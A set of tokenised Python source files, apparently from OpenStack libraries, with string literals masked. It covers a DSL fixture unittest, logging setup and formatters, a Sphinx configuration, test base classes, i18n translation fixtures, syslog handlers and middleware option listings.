<s> import unittest <EOL> from cafe . drivers . unittest import decorators <EOL> class DSLSuiteBuilderTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_FauxDSLFixture_raises_Exception ( self ) : <EOL> """<STR_LIT>""" <EOL> faux_fixture = type ( <EOL> '<STR_LIT>' , <EOL> ( object , ) , <EOL> dict ( decorators . _FauxDSLFixture . __dict__ ) ) <EOL> with self . assertRaises ( decorators . EmptyDSLError ) as e : <EOL> faux_fixture ( ) . setUpClass ( ) <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEquals ( msg , e . exception . message ) </s>
<s> """<STR_LIT>""" <EOL> import inspect <EOL> import itertools <EOL> import logging <EOL> import logging . config <EOL> import logging . handlers <EOL> import os <EOL> import sys <EOL> import traceback <EOL> from oslo_config import cfg <EOL> import six <EOL> from six import moves <EOL> _PY26 = sys . version_info [ <NUM_LIT:0> : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:6> ) <EOL> from os_doc_tools . openstack . common . gettextutils import _ <EOL> from os_doc_tools . openstack . common import importutils <EOL> from os_doc_tools . openstack . common import jsonutils <EOL> from os_doc_tools . openstack . common import local <EOL> from os_doc_tools . openstack . common . strutils import mask_password <EOL> _DEFAULT_LOG_DATE_FORMAT = "<STR_LIT>" <EOL> common_cli_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> short = '<STR_LIT:d>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> short = '<STR_LIT:v>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> logging_cli_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> deprecated_name = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = _DEFAULT_LOG_DATE_FORMAT , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> deprecated_name = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> deprecated_name = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . 
BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> ] <EOL> generic_log_opts = [ <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = True , <EOL> help = '<STR_LIT>' ) <EOL> ] <EOL> DEFAULT_LOG_LEVELS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> log_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . ListOpt ( '<STR_LIT>' , <EOL> default = DEFAULT_LOG_LEVELS , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . BoolOpt ( '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_cli_opts ( common_cli_opts ) <EOL> CONF . register_cli_opts ( logging_cli_opts ) <EOL> CONF . register_opts ( generic_log_opts ) <EOL> CONF . register_opts ( log_opts ) <EOL> logging . AUDIT = logging . INFO + <NUM_LIT:1> <EOL> logging . addLevelName ( logging . 
AUDIT , '<STR_LIT>' ) <EOL> try : <EOL> NullHandler = logging . NullHandler <EOL> except AttributeError : <EOL> class NullHandler ( logging . Handler ) : <EOL> def handle ( self , record ) : <EOL> pass <EOL> def emit ( self , record ) : <EOL> pass <EOL> def createLock ( self ) : <EOL> self . lock = None <EOL> def _dictify_context ( context ) : <EOL> if context is None : <EOL> return None <EOL> if not isinstance ( context , dict ) and getattr ( context , '<STR_LIT>' , None ) : <EOL> context = context . to_dict ( ) <EOL> return context <EOL> def _get_binary_name ( ) : <EOL> return os . path . basename ( inspect . stack ( ) [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> def _get_log_file_path ( binary = None ) : <EOL> logfile = CONF . log_file <EOL> logdir = CONF . log_dir <EOL> if logfile and not logdir : <EOL> return logfile <EOL> if logfile and logdir : <EOL> return os . path . join ( logdir , logfile ) <EOL> if logdir : <EOL> binary = binary or _get_binary_name ( ) <EOL> return '<STR_LIT>' % ( os . path . join ( logdir , binary ) , ) <EOL> return None <EOL> class BaseLoggerAdapter ( logging . LoggerAdapter ) : <EOL> def audit ( self , msg , * args , ** kwargs ) : <EOL> self . log ( logging . AUDIT , msg , * args , ** kwargs ) <EOL> def isEnabledFor ( self , level ) : <EOL> if _PY26 : <EOL> return self . logger . isEnabledFor ( level ) <EOL> else : <EOL> return super ( BaseLoggerAdapter , self ) . isEnabledFor ( level ) <EOL> class LazyAdapter ( BaseLoggerAdapter ) : <EOL> def __init__ ( self , name = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> self . _logger = None <EOL> self . extra = { } <EOL> self . name = name <EOL> self . version = version <EOL> @ property <EOL> def logger ( self ) : <EOL> if not self . _logger : <EOL> self . _logger = getLogger ( self . name , self . version ) <EOL> if six . PY3 : <EOL> self . _logger . manager = self . _logger . logger . manager <EOL> return self . 
_logger <EOL> class ContextAdapter ( BaseLoggerAdapter ) : <EOL> warn = logging . LoggerAdapter . warning <EOL> def __init__ ( self , logger , project_name , version_string ) : <EOL> self . logger = logger <EOL> self . project = project_name <EOL> self . version = version_string <EOL> self . _deprecated_messages_sent = dict ( ) <EOL> @ property <EOL> def handlers ( self ) : <EOL> return self . logger . handlers <EOL> def deprecated ( self , msg , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> stdmsg = _ ( "<STR_LIT>" ) % msg <EOL> if CONF . fatal_deprecations : <EOL> self . critical ( stdmsg , * args , ** kwargs ) <EOL> raise DeprecatedConfig ( msg = stdmsg ) <EOL> sent_args = self . _deprecated_messages_sent . setdefault ( msg , list ( ) ) <EOL> if args in sent_args : <EOL> return <EOL> sent_args . append ( args ) <EOL> self . warn ( stdmsg , * args , ** kwargs ) <EOL> def process ( self , msg , kwargs ) : <EOL> if not isinstance ( msg , six . string_types ) : <EOL> msg = six . text_type ( msg ) <EOL> if '<STR_LIT>' not in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = { } <EOL> extra = kwargs [ '<STR_LIT>' ] <EOL> context = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if not context : <EOL> context = getattr ( local . store , '<STR_LIT>' , None ) <EOL> if context : <EOL> extra . update ( _dictify_context ( context ) ) <EOL> instance = kwargs . pop ( '<STR_LIT>' , None ) <EOL> instance_uuid = ( extra . get ( '<STR_LIT>' ) or <EOL> kwargs . pop ( '<STR_LIT>' , None ) ) <EOL> instance_extra = '<STR_LIT>' <EOL> if instance : <EOL> instance_extra = CONF . instance_format % instance <EOL> elif instance_uuid : <EOL> instance_extra = ( CONF . instance_uuid_format <EOL> % { '<STR_LIT>' : instance_uuid } ) <EOL> extra [ '<STR_LIT>' ] = instance_extra <EOL> extra . setdefault ( '<STR_LIT>' , kwargs . pop ( '<STR_LIT>' , None ) ) <EOL> extra [ '<STR_LIT>' ] = self . project <EOL> extra [ '<STR_LIT:version>' ] = self . version <EOL> extra [ '<STR_LIT>' ] = extra . 
copy ( ) <EOL> return msg , kwargs <EOL> class JSONFormatter ( logging . Formatter ) : <EOL> def __init__ ( self , fmt = None , datefmt = None ) : <EOL> self . datefmt = datefmt <EOL> def formatException ( self , ei , strip_newlines = True ) : <EOL> lines = traceback . format_exception ( * ei ) <EOL> if strip_newlines : <EOL> lines = [ moves . filter ( <EOL> lambda x : x , <EOL> line . rstrip ( ) . splitlines ( ) ) for line in lines ] <EOL> lines = list ( itertools . chain ( * lines ) ) <EOL> return lines <EOL> def format ( self , record ) : <EOL> message = { '<STR_LIT:message>' : record . getMessage ( ) , <EOL> '<STR_LIT>' : self . formatTime ( record , self . datefmt ) , <EOL> '<STR_LIT:name>' : record . name , <EOL> '<STR_LIT>' : record . msg , <EOL> '<STR_LIT:args>' : record . args , <EOL> '<STR_LIT>' : record . levelname , <EOL> '<STR_LIT>' : record . levelno , <EOL> '<STR_LIT>' : record . pathname , <EOL> '<STR_LIT:filename>' : record . filename , <EOL> '<STR_LIT>' : record . module , <EOL> '<STR_LIT>' : record . lineno , <EOL> '<STR_LIT>' : record . funcName , <EOL> '<STR_LIT>' : record . created , <EOL> '<STR_LIT>' : record . msecs , <EOL> '<STR_LIT>' : record . relativeCreated , <EOL> '<STR_LIT>' : record . thread , <EOL> '<STR_LIT>' : record . threadName , <EOL> '<STR_LIT>' : record . processName , <EOL> '<STR_LIT>' : record . process , <EOL> '<STR_LIT>' : None } <EOL> if hasattr ( record , '<STR_LIT>' ) : <EOL> message [ '<STR_LIT>' ] = record . extra <EOL> if record . exc_info : <EOL> message [ '<STR_LIT>' ] = self . formatException ( record . exc_info ) <EOL> return jsonutils . dumps ( message ) <EOL> def _create_logging_excepthook ( product_name ) : <EOL> def logging_excepthook ( exc_type , value , tb ) : <EOL> extra = { '<STR_LIT>' : ( exc_type , value , tb ) } <EOL> getLogger ( product_name ) . critical ( <EOL> "<STR_LIT>" . join ( traceback . 
format_exception_only ( exc_type , value ) ) , <EOL> ** extra ) <EOL> return logging_excepthook <EOL> class LogConfigError ( Exception ) : <EOL> message = _ ( '<STR_LIT>' ) <EOL> def __init__ ( self , log_config , err_msg ) : <EOL> self . log_config = log_config <EOL> self . err_msg = err_msg <EOL> def __str__ ( self ) : <EOL> return self . message % dict ( log_config = self . log_config , <EOL> err_msg = self . err_msg ) <EOL> def _load_log_config ( log_config_append ) : <EOL> try : <EOL> logging . config . fileConfig ( log_config_append , <EOL> disable_existing_loggers = False ) <EOL> except ( moves . configparser . Error , KeyError ) as exc : <EOL> raise LogConfigError ( log_config_append , six . text_type ( exc ) ) <EOL> def setup ( product_name , version = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if CONF . log_config_append : <EOL> _load_log_config ( CONF . log_config_append ) <EOL> else : <EOL> _setup_logging_from_conf ( product_name , version ) <EOL> sys . excepthook = _create_logging_excepthook ( product_name ) <EOL> def set_defaults ( logging_context_format_string = None , <EOL> default_log_levels = None ) : <EOL> if default_log_levels is not None : <EOL> cfg . set_defaults ( <EOL> log_opts , <EOL> default_log_levels = default_log_levels ) <EOL> if logging_context_format_string is not None : <EOL> cfg . set_defaults ( <EOL> log_opts , <EOL> logging_context_format_string = logging_context_format_string ) <EOL> def _find_facility_from_conf ( ) : <EOL> facility_names = logging . handlers . SysLogHandler . facility_names <EOL> facility = getattr ( logging . handlers . SysLogHandler , <EOL> CONF . syslog_log_facility , <EOL> None ) <EOL> if facility is None and CONF . syslog_log_facility in facility_names : <EOL> facility = facility_names . get ( CONF . syslog_log_facility ) <EOL> if facility is None : <EOL> valid_facilities = facility_names . 
keys ( ) <EOL> consts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> valid_facilities . extend ( consts ) <EOL> raise TypeError ( _ ( '<STR_LIT>' ) % <EOL> '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" % fac <EOL> for fac in valid_facilities ) ) <EOL> return facility <EOL> class RFCSysLogHandler ( logging . handlers . SysLogHandler ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . binary_name = _get_binary_name ( ) <EOL> logging . handlers . SysLogHandler . __init__ ( self , * args , ** kwargs ) <EOL> def format ( self , record ) : <EOL> msg = logging . handlers . SysLogHandler . format ( self , record ) <EOL> msg = self . binary_name + '<STR_LIT:U+0020>' + msg <EOL> return msg <EOL> def _setup_logging_from_conf ( project , version ) : <EOL> log_root = getLogger ( None ) . logger <EOL> for handler in log_root . handlers : <EOL> log_root . removeHandler ( handler ) <EOL> if CONF . use_syslog : <EOL> facility = _find_facility_from_conf ( ) <EOL> if CONF . use_syslog_rfc_format : <EOL> syslog = RFCSysLogHandler ( address = '<STR_LIT>' , <EOL> facility = facility ) <EOL> else : <EOL> syslog = logging . handlers . SysLogHandler ( address = '<STR_LIT>' , <EOL> facility = facility ) <EOL> log_root . addHandler ( syslog ) <EOL> logpath = _get_log_file_path ( ) <EOL> if logpath : <EOL> filelog = logging . handlers . WatchedFileHandler ( logpath ) <EOL> log_root . addHandler ( filelog ) <EOL> if CONF . use_stderr : <EOL> streamlog = ColorHandler ( ) <EOL> log_root . addHandler ( streamlog ) <EOL> elif not logpath : <EOL> streamlog = logging . StreamHandler ( sys . stdout ) <EOL> log_root . addHandler ( streamlog ) <EOL> if CONF . 
publish_errors : <EOL> try : <EOL> handler = importutils . import_object ( <EOL> "<STR_LIT>" , <EOL> logging . ERROR ) <EOL> except ImportError : <EOL> handler = importutils . import_object ( <EOL> "<STR_LIT>" , <EOL> logging . ERROR ) <EOL> log_root . addHandler ( handler ) <EOL> datefmt = CONF . log_date_format <EOL> for handler in log_root . handlers : <EOL> if CONF . log_format : <EOL> handler . setFormatter ( logging . Formatter ( fmt = CONF . log_format , <EOL> datefmt = datefmt ) ) <EOL> log_root . info ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> handler . setFormatter ( ContextFormatter ( project = project , <EOL> version = version , <EOL> datefmt = datefmt ) ) <EOL> if CONF . debug : <EOL> log_root . setLevel ( logging . DEBUG ) <EOL> elif CONF . verbose : <EOL> log_root . setLevel ( logging . INFO ) <EOL> else : <EOL> log_root . setLevel ( logging . WARNING ) <EOL> for pair in CONF . default_log_levels : <EOL> mod , _sep , level_name = pair . partition ( '<STR_LIT:=>' ) <EOL> logger = logging . getLogger ( mod ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> level = logging . getLevelName ( level_name ) <EOL> logger . setLevel ( level ) <EOL> else : <EOL> logger . setLevel ( level_name ) <EOL> _loggers = { } <EOL> def getLogger ( name = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> if name not in _loggers : <EOL> _loggers [ name ] = ContextAdapter ( logging . getLogger ( name ) , <EOL> name , <EOL> version ) <EOL> return _loggers [ name ] <EOL> def getLazyLogger ( name = '<STR_LIT>' , version = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return LazyAdapter ( name , version ) <EOL> class WritableLogger ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , logger , level = logging . INFO ) : <EOL> self . logger = logger <EOL> self . level = level <EOL> def write ( self , msg ) : <EOL> self . logger . log ( self . level , msg . rstrip ( ) ) <EOL> class ContextFormatter ( logging . 
Formatter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . project = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . version = kwargs . pop ( '<STR_LIT:version>' , '<STR_LIT>' ) <EOL> logging . Formatter . __init__ ( self , * args , ** kwargs ) <EOL> def format ( self , record ) : <EOL> """<STR_LIT>""" <EOL> record . project = self . project <EOL> record . version = self . version <EOL> context = getattr ( local . store , '<STR_LIT>' , None ) <EOL> if context : <EOL> d = _dictify_context ( context ) <EOL> for k , v in d . items ( ) : <EOL> setattr ( record , k , v ) <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if key not in record . __dict__ : <EOL> record . __dict__ [ key ] = '<STR_LIT>' <EOL> if record . __dict__ . get ( '<STR_LIT>' ) : <EOL> fmt = CONF . logging_context_format_string <EOL> else : <EOL> fmt = CONF . logging_default_format_string <EOL> if ( record . levelno == logging . DEBUG and <EOL> CONF . logging_debug_format_suffix ) : <EOL> fmt += "<STR_LIT:U+0020>" + CONF . logging_debug_format_suffix <EOL> if sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:2> ) : <EOL> self . _fmt = fmt <EOL> else : <EOL> self . _style = logging . PercentStyle ( fmt ) <EOL> self . _fmt = self . _style . _fmt <EOL> if record . exc_info : <EOL> record . exc_text = self . formatException ( record . exc_info , record ) <EOL> return logging . Formatter . format ( self , record ) <EOL> def formatException ( self , exc_info , record = None ) : <EOL> """<STR_LIT>""" <EOL> if not record : <EOL> return logging . Formatter . formatException ( self , exc_info ) <EOL> stringbuffer = moves . StringIO ( ) <EOL> traceback . print_exception ( exc_info [ <NUM_LIT:0> ] , exc_info [ <NUM_LIT:1> ] , exc_info [ <NUM_LIT:2> ] , <EOL> None , stringbuffer ) <EOL> lines = stringbuffer . getvalue ( ) . split ( '<STR_LIT:\n>' ) <EOL> stringbuffer . close ( ) <EOL> if CONF . logging_exception_prefix . 
find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> record . asctime = self . formatTime ( record , self . datefmt ) <EOL> formatted_lines = [ ] <EOL> for line in lines : <EOL> pl = CONF . logging_exception_prefix % record . __dict__ <EOL> fl = '<STR_LIT>' % ( pl , line ) <EOL> formatted_lines . append ( fl ) <EOL> return '<STR_LIT:\n>' . join ( formatted_lines ) <EOL> class ColorHandler ( logging . StreamHandler ) : <EOL> LEVEL_COLORS = { <EOL> logging . DEBUG : '<STR_LIT>' , <EOL> logging . INFO : '<STR_LIT>' , <EOL> logging . AUDIT : '<STR_LIT>' , <EOL> logging . WARN : '<STR_LIT>' , <EOL> logging . ERROR : '<STR_LIT>' , <EOL> logging . CRITICAL : '<STR_LIT>' , <EOL> } <EOL> def format ( self , record ) : <EOL> record . color = self . LEVEL_COLORS [ record . levelno ] <EOL> return logging . StreamHandler . format ( self , record ) <EOL> class DeprecatedConfig ( Exception ) : <EOL> message = _ ( "<STR_LIT>" ) <EOL> def __init__ ( self , msg ) : <EOL> super ( Exception , self ) . __init__ ( self . message % dict ( msg = msg ) ) </s>
<s> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> import pbr . version <EOL> occ_version = pbr . version . VersionInfo ( '<STR_LIT>' ) <EOL> version = occ_version . canonical_version_string ( ) <EOL> release = occ_version . version_string_with_vcs ( ) <EOL> exclude_patterns = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> import os <EOL> import fixtures <EOL> import testtools <EOL> _TRUE_VALUES = ( '<STR_LIT:true>' , '<STR_LIT:1>' , '<STR_LIT:yes>' ) <EOL> class TestCase ( testtools . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TestCase , self ) . setUp ( ) <EOL> test_timeout = os . environ . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> try : <EOL> test_timeout = int ( test_timeout ) <EOL> except ValueError : <EOL> test_timeout = <NUM_LIT:0> <EOL> if test_timeout > <NUM_LIT:0> : <EOL> self . useFixture ( fixtures . Timeout ( test_timeout , gentle = True ) ) <EOL> self . useFixture ( fixtures . NestedTempfile ( ) ) <EOL> self . useFixture ( fixtures . TempHomeDir ( ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stdout = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stdout ) ) <EOL> if os . environ . get ( '<STR_LIT>' ) in _TRUE_VALUES : <EOL> stderr = self . useFixture ( fixtures . StringStream ( '<STR_LIT>' ) ) . stream <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , stderr ) ) <EOL> self . log_fixture = self . useFixture ( fixtures . FakeLogger ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import gettext <EOL> import fixtures <EOL> import six <EOL> from oslo_i18n import _lazy <EOL> from oslo_i18n import _message <EOL> class Translation ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , domain = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . domain = domain <EOL> def lazy ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> return _message . Message ( msg , domain = self . domain ) <EOL> def immediate ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> return six . text_type ( msg ) <EOL> class ToggleLazy ( fixtures . Fixture ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> super ( ToggleLazy , self ) . __init__ ( ) <EOL> self . _enabled = enabled <EOL> self . _original_value = _lazy . USE_LAZY <EOL> def setUp ( self ) : <EOL> super ( ToggleLazy , self ) . setUp ( ) <EOL> self . addCleanup ( self . _restore_original ) <EOL> _lazy . enable_lazy ( self . _enabled ) <EOL> def _restore_original ( self ) : <EOL> _lazy . enable_lazy ( self . _original_value ) <EOL> class _PrefixTranslator ( gettext . NullTranslations ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fp = None , prefix = '<STR_LIT>' ) : <EOL> gettext . NullTranslations . __init__ ( self , fp ) <EOL> self . prefix = prefix <EOL> def gettext ( self , message ) : <EOL> msg = gettext . NullTranslations . gettext ( self , message ) <EOL> return self . prefix + msg <EOL> def ugettext ( self , message ) : <EOL> msg = gettext . NullTranslations . ugettext ( self , message ) <EOL> return self . prefix + msg <EOL> def _prefix_translations ( * x , ** y ) : <EOL> """<STR_LIT>""" <EOL> return _PrefixTranslator ( prefix = x [ <NUM_LIT:0> ] + '<STR_LIT:/>' + y [ '<STR_LIT>' ] [ <NUM_LIT:0> ] + '<STR_LIT>' ) <EOL> class PrefixLazyTranslation ( fixtures . 
Fixture ) : <EOL> """<STR_LIT>""" <EOL> _DEFAULT_LANG = '<STR_LIT>' <EOL> def __init__ ( self , languages = None , locale = None ) : <EOL> super ( PrefixLazyTranslation , self ) . __init__ ( ) <EOL> self . languages = languages or [ PrefixLazyTranslation . _DEFAULT_LANG ] <EOL> self . locale = locale <EOL> def setUp ( self ) : <EOL> super ( PrefixLazyTranslation , self ) . setUp ( ) <EOL> self . useFixture ( ToggleLazy ( True ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * x , ** y : self . languages ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( <EOL> '<STR_LIT>' , <EOL> lambda * x , ** y : self . languages ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , <EOL> _prefix_translations ) ) <EOL> self . useFixture ( fixtures . MonkeyPatch ( '<STR_LIT>' , <EOL> lambda * x , ** y : self . locale ) ) </s>
<s> import inspect <EOL> import logging <EOL> import logging . config <EOL> import logging . handlers <EOL> import os <EOL> try : <EOL> import syslog <EOL> except ImportError : <EOL> syslog = None <EOL> NullHandler = logging . NullHandler <EOL> def _get_binary_name ( ) : <EOL> return os . path . basename ( inspect . stack ( ) [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> _AUDIT = logging . INFO + <NUM_LIT:1> <EOL> _TRACE = <NUM_LIT:5> <EOL> if syslog is not None : <EOL> class OSSysLogHandler ( logging . Handler ) : <EOL> """<STR_LIT>""" <EOL> severity_map = { <EOL> "<STR_LIT>" : syslog . LOG_CRIT , <EOL> "<STR_LIT>" : syslog . LOG_DEBUG , <EOL> "<STR_LIT>" : syslog . LOG_ERR , <EOL> "<STR_LIT>" : syslog . LOG_INFO , <EOL> "<STR_LIT>" : syslog . LOG_WARNING , <EOL> "<STR_LIT>" : syslog . LOG_WARNING , <EOL> } <EOL> def __init__ ( self , facility = syslog . LOG_USER ) : <EOL> logging . Handler . __init__ ( self ) <EOL> binary_name = _get_binary_name ( ) <EOL> syslog . openlog ( binary_name , <NUM_LIT:0> , facility ) <EOL> def emit ( self , record ) : <EOL> syslog . syslog ( self . severity_map . get ( record . levelname , <EOL> syslog . LOG_DEBUG ) , <EOL> self . format ( record ) ) <EOL> class ColorHandler ( logging . StreamHandler ) : <EOL> LEVEL_COLORS = { <EOL> _TRACE : '<STR_LIT>' , <EOL> logging . DEBUG : '<STR_LIT>' , <EOL> logging . INFO : '<STR_LIT>' , <EOL> _AUDIT : '<STR_LIT>' , <EOL> logging . WARN : '<STR_LIT>' , <EOL> logging . ERROR : '<STR_LIT>' , <EOL> logging . CRITICAL : '<STR_LIT>' , <EOL> } <EOL> def format ( self , record ) : <EOL> record . color = self . LEVEL_COLORS [ record . levelno ] <EOL> return logging . StreamHandler . format ( self , record ) </s>
<s> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> import copy <EOL> import itertools <EOL> from oslo_middleware import cors <EOL> from oslo_middleware import sizelimit <EOL> from oslo_middleware import ssl <EOL> def list_opts ( ) : <EOL> """<STR_LIT>""" <EOL> return list ( <EOL> itertools . chain ( <EOL> list_opts_sizelimit ( ) , <EOL> list_opts_ssl ( ) , <EOL> list_opts_cors ( ) , <EOL> ) <EOL> ) <EOL> def list_opts_sizelimit ( ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> ( '<STR_LIT>' , copy . deepcopy ( sizelimit . _opts ) ) , <EOL> ] <EOL> def list_opts_ssl ( ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> ( '<STR_LIT>' , copy . deepcopy ( ssl . OPTS ) ) , <EOL> ] <EOL> def list_opts_cors ( ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> ( '<STR_LIT>' , copy . deepcopy ( cors . CORS_OPTS ) ) , <EOL> ( '<STR_LIT>' , copy . deepcopy ( cors . CORS_OPTS ) ) <EOL> ] </s>
